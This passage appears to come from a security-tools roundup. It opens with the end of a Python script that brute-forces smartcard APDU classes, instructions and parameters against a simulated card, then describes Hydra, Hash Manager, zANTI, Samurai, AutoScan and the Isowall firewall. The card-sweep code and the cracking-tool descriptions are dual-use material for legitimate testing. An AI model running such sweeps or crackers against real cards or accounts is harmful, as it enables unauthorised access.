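    order = list(range(256))
    if fast:
        order = list(FAST_CLASSES) + [c for c in order if c not in FAST_CLASSES]
    return [cla for cla in order if transmit(bytes([cla, PROBE_INS, 0, 0, 0])) != 0x6E00]

def brute_instructions(transmit, classes, undocumented_only=False):
    """Sweep INS 0x00-0xFF per live class; keep pairs not rejected with 6D00/6E00."""
    hits = []
    for cla in classes:
        for ins in range(256):
            sw = transmit(bytes([cla, ins, 0, 0, 0]))
            if sw in (0x6D00, 0x6E00) or (undocumented_only and ins in STANDARD_INS):
                continue
            hits.append((cla, ins, sw))
    return hits

def brute_p1p2(transmit, cla, ins):
    """P1/P2 pairs the card accepts for a known CLA/INS (both parameters swept)."""
    rejected = (0x6A86, 0x6B00, 0x6D00, 0x6E00)
    return [(p1, p2) for p1 in range(256) for p2 in range(256)
            if transmit(bytes([cla, ins, p1, p2, 0])) not in rejected]

if __name__ == "__main__":
    classes = live_classes(fake_transmit)
    print("live classes:", [hex(c) for c in classes])
    for cla, ins, sw in brute_instructions(fake_transmit, classes, undocumented_only=True):
        print(f"undocumented: CLA {cla:02X} INS {ins:02X} -> SW {sw:04X}")
    print("accepted P1/P2 for A0 A4:", brute_p1p2(fake_transmit, 0xA0, 0xA4))
```

Against real hardware, replace fake_transmit with a PC/SC transmit call and be aware that a full CLA/INS sweep sends 65536 commands, and that some of them (VERIFY with a wrong PIN, for instance) consume retry counters; 63CX answers like the one above are exactly the signal to stop sending that instruction.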


AutoScan-Network - Automatically scan your network


AutoScan-Network is a network scanner (a discovery and management application). No configuration is required to scan your network; the main goal is to list the devices connected to it.

System Requirements:
• Mac OS X 10.5 or later
• Microsoft Windows (XP, Vista)
• GNU/Linux
• Maemo 4
• Sun OpenSolaris

Features:
• Fast network scanner
• Automatic network discovery
• TCP/IP scanner
• Wake-on-LAN functionality
• Multi-threaded scanner
• Port scanner
• Low load on the network
• VNC client
• Telnet client
• SNMP scanner
• Simultaneous scans of several subnets without human intervention
• Real-time detection of any newly connected device
• Supervision of any device (router, server, firewall, ...)
• Supervision of any network service (SMTP, HTTP, POP, ...)
• Automatic detection of known operating systems (brand and version); unknown devices can be added to the database
• The graphical interface can connect to one or more scanner agents (local or remote)
• Scanner agents can be deployed across the network to scan through any type of equipment (router, NAT, etc.)
• Intruder detection (in intruder-detection mode, every newly seen device is blacklisted)
• The complete network tree can be saved to an XML file
• No privileged account is required


THC-Hydra 8.1 - Network Logon Cracker

A very fast network logon cracker which supports many different services.

See the feature-set and service-coverage page, which includes a speed comparison against ncrack and medusa. Passwords are one of the biggest security holes, as every password security study shows.

This tool is proof-of-concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.

There are already several login hacker tools available, however none supports more than one protocol to attack or supports parallelized connects.

It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.

Currently this tool supports the following protocols:
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

CHANGELOG for 8.1
        ! Development moved to a public github repository: https://github.com/vanhauser-thc/thc-hydra

* David Maciejak, my co-maintainer moved to a different job and country and can not help with Hydra anymore - sadly! Wish you all the best!
* Added patch from Ander Juaristi which adds h/H header options for http-form-*, great work, thanks!
* Found login:password combinations are now printed with the name specified (hostname or IP), not always IP
* Fixed the -M option, works now with many many targets :-)
* -M option now supports ports, add a colon in between: "host:port", or, if IPv6, "[ipv6ipaddress]:port"
* Fixed cisco-enable if an initial Login/Password is used (thanks to joswr1te for reporting)
* Added patch by tux-mind for better MySQL compilation, plus Android patches and a Makefile. Thanks!
* Added xhydra gtk patches by Petar Kaleychev to support -h, -U, -f, -F, -q and -e r options, thanks!
* Added patch for teamspeak to better identify server errors and auth failures (thanks to Petar Kaleychev)
* Fixed a crash in the cisco module (thanks to Anatoly Mamaev for reporting)
* Small fix for HTTP form module for redirect pages where a S= string match would not work (thanks to mkosmach for reporting)
* Updated configure to detect subversion packages on current Cygwin
* Fixed RDP module to support the port option (thanks to and.enshin(at)gmail.com)


zANTI 2.0 - Android Network Toolkit


zANTI is a mobile penetration testing toolkit that lets security managers assess the risk level of a network at the push of a button. This easy-to-use mobile toolkit enables IT security administrators to simulate an advanced attacker and identify the malicious techniques used in the wild to compromise corporate networks.

Scan

Uncover authentication, backdoor and brute-force attacks, DNS and protocol-specific attacks and rogue access points using a comprehensive range of fully customizable network reconnaissance scans.

Diagnose

Enables security officers to easily evaluate an organization's network and automatically diagnose vulnerabilities in mobile devices or web sites using a host of penetration tests including man-in-the-middle (MITM), password cracking and Metasploit.

Report

Highlight security gaps in your existing network and mobile defenses and report the results with advanced cloud-based reporting through zConsole. zANTI mirrors the methods a cyber-attacker can use to identify security holes within your network. Dashboard reporting enables businesses to see the risks and take appropriate corrective actions to fix critical security issues.


Samurai Web Testing Framework 3.0 - LiveCD Web Pen-testing Environment


The Samurai project team is happy to announce the release of a development version of the Samurai Web Testing Framework. This release is a fully functional Linux environment with a number of tools pre-installed. Our hope is that people who are interested in making this the best live CD for web testing will provide feedback on what they would like to see included on the CD.

The Samurai Web Testing Framework is a live Linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.
Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such as WebScarab and ratproxy. We then chose tools for discovery, which include w3af and Burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.

Tools
  • recon-ng
  • w3af
  • BeEF
  • Burp
  • OWASP
  • Rat
  • DirBuster
  • CeWL
  • Sqlmap
  • Maltego
  • WebScarab
  • Nmap
  • Zenmap
  • Nikto
  • Metasploit
  • Firefox
  • Tilt
  • Wappalyzer
  • FoxyProxy
  • ZAP
  • Firebug
  • RaJ
  • iMacro
  • ZAP TokenGen
  • Burpsuite Sequencer
  • User Agent Switcher
  • Cookies
  • Laudanum


Hash Manager - Recovering passwords to hashes


The software is designed for recovering passwords from hashes, and it features the following:
  • Supports over 330 hashing algorithms.
  • Contains over 50 additional utilities for handling hashes, passwords, and dictionaries.
  • Unlimited numbers of loaded hashes, dictionaries, rules, and masks.
  • Multithreading.
  • 64-bit.
  • Maximum optimization for working with large hash lists.
  • Maximum optimization for working with dictionaries.
  • Optimization for the newest CPUs.
  • Hashing modules as stand-alone DLL files.
  • Convenient control over operation using command files.
  • Hex user names and salts.
  • Recovery of Unicode passwords.
  • And much more.

Changelog:

Version 1.1
- Added the hybrid attack (AttackMode=4).
- Added new hashing module: PBKDF2 SHA-256(2).
- Some bugs fixed.

Version 1.1.1
- Significantly sped up all modules that use the SHA-1 algorithm.

Version 1.1.2
- Added new hashing modules:
  sha256(md5($pass).$salt)
  sha256(sha1($pass).$salt)
  PBKDF2 SHA-256(3)
- Added new tools:
  ValidateRules
  IsOutputFile
  RemoveLines

Version 1.1.3
- Added new hashing modules:
  substr(sha1($pass),0,38)
  SHA-1(LinkedIn)
  PBKDF2 JIRA
  Blake-224
  Blake-256
  Blake-384
  Blake-512
  md5(md5(md5($pass)).$salt)
- Added new PBKDF2 hashing modules.
- Added 14 hashing modules with no specific information on where exactly they are used, so they are called Custom(x).dll.

Version 1.1.4
- Added new hashing modules:
  Panama
  MD4(Round 1)
  BlackBerry ES v10
  MongoDB(1)
  MongoDB(2)
- Added new tools:
  ReverseLines
  SwapBytes
  HexToBin
  BinToHex
  CalculateChecksum (supports CRC-64, MD5, and SHA-1)
- Added new dictionary: "Top10000.dic".




Isowall - A mini-firewall that completely isolates a target device from the local network


This is a mini-firewall that completely isolates a target device from the local network. This is for allowing infected machines Internet access, but without endangering the local network.

Building

This project depends upon libpcap, and of course a C compiler.
On Debian, the following should work:
# apt-get install git gcc make libpcap-dev
# git clone https://github.com/robertdavidgraham/isowall
# cd isowall
# make

This will put the binary isowall in the local isowall/bin directory.
This should also work on Windows, Mac OS X, the BSDs, and pretty much any operating system that supports libpcap.

Running

First, setup a machine with three network interfaces.

The first network interface (like eth0) will be configured as normal, with a TCP/IP stack, so that you can SSH to it.

The other two network interfaces should have no TCP/IP stack, no IP address, no anything. This is the most important configuration step, and the most common thing you'll get wrong. For example, the DHCP software on the box may be configured to automatically send out DHCP requests on these additional interfaces. You have to go fix that so nothing is bound to these interfaces.

To run, simply type:
# ./bin/isowall --internal eth1 --external eth2 -c xxxx.conf

where xxxx.conf contains your configuration, which is described below.

Configuration

The following shows a typical configuration file.
internal = eth1
internal.target.ip = 10.0.0.129
internal.target.mac = 02:60:8c:37:87:f3

external = eth2
external.router.ip = 10.0.0.1
external.router.mac = 66:55:44:33:22:11

allow = 0.0.0.0/0
block = 192.168.0.0/16
block = 10.0.0.0/8
block = 224.0.0.0-255.255.255.255


The target device we are isolating has the indicated IP and MAC address.

Only IPv4 and ARP packets are passed.

Outbound packets must have the following conditions:
  • source MAC address equal to internal.target.mac
  • destination MAC address equal to external.router.mac
  • EtherType of 0x800 or 0x806
  • source IPv4 address equal to internal.target.ip
  • destination IPv4 address within an allow range, but not in a block range
  • if an ARP packet, then the destination (target) IPv4 address must equal external.router.ip
  • if an ARP packet, must be a "request"

Inbound packets must have the following conditions:
  • destination MAC address equal to internal.target.mac
  • source MAC address equal to external.router.mac
  • EtherType of 0x800 or 0x806
  • destination IPv4 address equal to internal.target.ip
  • source IPv4 address within an allow range, but not in a block range
  • if an ARP packet, then the source (sender) IPv4 address must equal external.router.ip
  • if an ARP packet, then must be a "reply"
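The two rule lists above are the entire policy: everything not on them is dropped, and the target's own subnet is reachable only through the router because 10.0.0.0/8 is blocked. The following is an added example, not Isowall's code, that turns those rules into a Python evaluator over the configuration format shown above and a few constructed Ethernet/IPv4/ARP frames; Isowall itself is C on libpcap and only the decision logic is reproduced. The frame builders exist just to feed the evaluator. One consequence of the rules as listed is visible in the example: an outbound ARP request only passes if its destination MAC is the router's, so a broadcast ARP request from the target does not satisfy the rule and the sample request is addressed to the router's MAC directly.

```python
"""Added example, not Isowall's code: the outbound/inbound decision from the two rule
lists above, written as a Python evaluator over Isowall's configuration format and a
few constructed Ethernet/IPv4/ARP frames. Isowall itself is C on libpcap; only the
rules are reproduced here, and the frame builders exist just to feed the evaluator."""
import ipaddress
import struct

SAMPLE_CONF = """
internal = eth1
internal.target.ip = 10.0.0.129
internal.target.mac = 02:60:8c:37:87:f3
external = eth2
external.router.ip = 10.0.0.1
external.router.mac = 66:55:44:33:22:11
allow = 0.0.0.0/0
block = 192.168.0.0/16
block = 10.0.0.0/8
block = 224.0.0.0-255.255.255.255
"""

def parse_range(text):
    """'a.b.c.d/n' or 'a.b.c.d-e.f.g.h' -> (first, last) as integers."""
    if "-" in text:
        lo, hi = text.split("-")
        return int(ipaddress.IPv4Address(lo)), int(ipaddress.IPv4Address(hi))
    net = ipaddress.IPv4Network(text, strict=False)
    return int(net[0]), int(net[-1])

def parse_conf(text):
    conf = {"allow": [], "block": []}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = (p.strip() for p in line.partition("="))
        if key in ("allow", "block"):
            conf[key].append(parse_range(value))
        else:
            conf[key] = value
    return conf

def ip_permitted(conf, ip):
    """Within some allow range and within no block range."""
    n = int(ipaddress.IPv4Address(ip))
    return (any(lo <= n <= hi for lo, hi in conf["allow"])
            and not any(lo <= n <= hi for lo, hi in conf["block"]))

def parse_frame(frame):
    """Pull out the MACs, EtherType and IPv4/ARP addresses the rules look at."""
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    f = {"dst_mac": mac(frame[:6]), "src_mac": mac(frame[6:12]),
         "ethertype": struct.unpack("!H", frame[12:14])[0]}
    body = frame[14:]
    if f["ethertype"] == 0x0800 and len(body) >= 20:
        f["src_ip"], f["dst_ip"] = (str(ipaddress.IPv4Address(body[o:o + 4])) for o in (12, 16))
    elif f["ethertype"] == 0x0806 and len(body) >= 28:
        f["arp_op"] = struct.unpack("!H", body[6:8])[0]            # 1 request, 2 reply
        f["src_ip"], f["dst_ip"] = (str(ipaddress.IPv4Address(body[o:o + 4])) for o in (14, 24))
    return f

def _check(conf, frame, fixed_field, arp_op):
    """Shared rule body; fixed_field is the side that must equal internal.target.ip."""
    f = parse_frame(frame)
    if "src_ip" not in f:                                   # not IPv4/ARP, or truncated
        return False
    target, router = conf["internal.target.mac"].lower(), conf["external.router.mac"].lower()
    want = (target, router) if fixed_field == "src_ip" else (router, target)
    if (f["src_mac"], f["dst_mac"]) != want or f[fixed_field] != conf["internal.target.ip"]:
        return False
    other = f["dst_ip"] if fixed_field == "src_ip" else f["src_ip"]
    if f["ethertype"] == 0x0806:
        return f["arp_op"] == arp_op and other == conf["external.router.ip"]
    return ip_permitted(conf, other)

def outbound_allowed(conf, frame):
    """Target -> router: source must be the target; only ARP requests pass."""
    return _check(conf, frame, "src_ip", 1)

def inbound_allowed(conf, frame):
    """Router -> target: destination must be the target; only ARP replies pass."""
    return _check(conf, frame, "dst_ip", 2)

def _mac(s):
    return bytes(int(x, 16) for x in s.split(":"))

def build_ipv4(src_mac, dst_mac, src_ip, dst_ip):
    """Constructed Ethernet+IPv4 header with no payload (checksum left zero)."""
    ip = bytearray(20)
    ip[0], ip[9] = 0x45, 6                                  # IHL=5, protocol TCP
    ip[12:16] = ipaddress.IPv4Address(src_ip).packed
    ip[16:20] = ipaddress.IPv4Address(dst_ip).packed
    return _mac(dst_mac) + _mac(src_mac) + b"\x08\x00" + bytes(ip)

def build_arp(src_mac, dst_mac, op, sender_ip, target_ip):
    """Constructed Ethernet+ARP frame; op 1 = request, 2 = reply."""
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) + _mac(src_mac)
           + ipaddress.IPv4Address(sender_ip).packed + _mac(dst_mac)
           + ipaddress.IPv4Address(target_ip).packed)
    return _mac(dst_mac) + _mac(src_mac) + b"\x08\x06" + arp

CONF = parse_conf(SAMPLE_CONF)
T_MAC, R_MAC = CONF["internal.target.mac"], CONF["external.router.mac"]

if __name__ == "__main__":
    print(outbound_allowed(CONF, build_ipv4(T_MAC, R_MAC, "10.0.0.129", "93.184.216.34")))   # True
    print(outbound_allowed(CONF, build_ipv4(T_MAC, R_MAC, "10.0.0.129", "10.0.0.5")))        # False
```

The evaluator is deliberately a whitelist: a frame with a spoofed source IP, a source MAC other than the target's, an IPv6 EtherType, or a destination inside any block range is dropped without a specific rule saying so. That is what makes the isolation hold even when the isolated machine is hostile.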